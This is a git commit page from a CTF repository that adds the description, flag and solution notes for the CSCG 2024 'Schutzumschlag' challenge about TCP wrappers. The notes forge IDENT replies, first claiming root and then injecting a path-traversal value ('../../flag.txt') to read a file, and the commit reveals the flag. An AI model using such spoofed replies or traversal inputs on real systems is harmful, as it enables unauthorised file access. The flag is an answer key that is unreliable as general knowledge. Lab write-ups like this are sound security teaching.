cscg24-schutzumschlag

CSCG 2024 Challenge 'Schutzumschlag'
git clone https://git.sinitax.com/sinitax/cscg24-schutzumschlag
Log | Files | Refs | sfeed.txt
commit f824f956e6c3cc9e8bb5a10330d20cc65fdcd696
Author: Louis Burda <quent.burda@gmail.com>
Date:   Thu, 14 Mar 2024 20:55:53 +0100

Add solution

Diffstat:

Achall/description | 5+++++


Achall/flag | 1+


Achall/notes | 46++++++++++++++++++++++++++++++++++++++++++++++


3 files changed, 52 insertions(+), 0 deletions(-)

diff --git a/chall/description b/chall/description
@@ -0,0 +1,5 @@
+To make SSH on my server even more secure, I decided to use TCP wrappers (Schutzumschläge für TCP)! Feel free to check it out by connecting to it. And make sure to check the the debugging messages if the connection fails! Use the server below to connect to my main host, which runs on port 2000 localhost. Your user ctf has sudo privileges on the host provided below.
+
+The protected "schutzumschlag" host is available via ssh -p 2000 localhost. Per default, our networking uses IPv6 btw :)
+
+https://www.debian.org/doc/manuals/securing-debian-manual/tcpwrappers.de.html
diff --git a/chall/flag b/chall/flag
@@ -0,0 +1 @@
+CSCG{wr4p_4ll_th3_th1ngs:)}
diff --git a/chall/notes b/chall/notes
@@ -0,0 +1,46 @@
+Connect to the service
+
+By running `find /` we find out the flag file is in /flag.txt,
+but the correct contents are on the victim machine we can access
+via `ssh -p 2000 localhost`.
+
+Use `ssh -p 2000 localhost` to connect and get the following error:
+
+Connection to localhost (::1) 2000 port [tcp/*] succeeded!
+#########################################################################
+#                                                                       #
+#                            Unknown User!                              #
+#                                                                       #
+#########################################################################
+TCP Wrappers:  Connection refused! Make sure that port 113 can be reached!
+User:          unknown
+Client:        ::1
+Hostname:      localhost
+Date:          Thu Mar 14 19:50:09 UTC 2024
+
+We open up port 113 using `ncat -6 -l -p 113` (ipv6 based on description hint)
+
+Next time we connect we get a single line from the victim:
+36362,2000
+
+Googling "service port 113" we find that this is the port for the IDENT
+service which when given a src,dst port pair returns the user initiating
+the connection.
+
+If we connect again and reply with `36362,2000 : USERID : UNIX : root`
+we get the following instead:
+
+cat: /tmp/users/root: No such file or directory
+
+TCP Wrappers:  Hello root !
+User:          root
+Client:        ::1
+Hostname:      localhost
+Date:          Thu Mar 14 19:49:50 UTC 2024
+
+So for some reason, the user is used in a shell command to cat a file...
+
+Using path traversal we can read the flag:
+
+XXXXX,2000 : USERID : UNIX : ../../flag.txt
+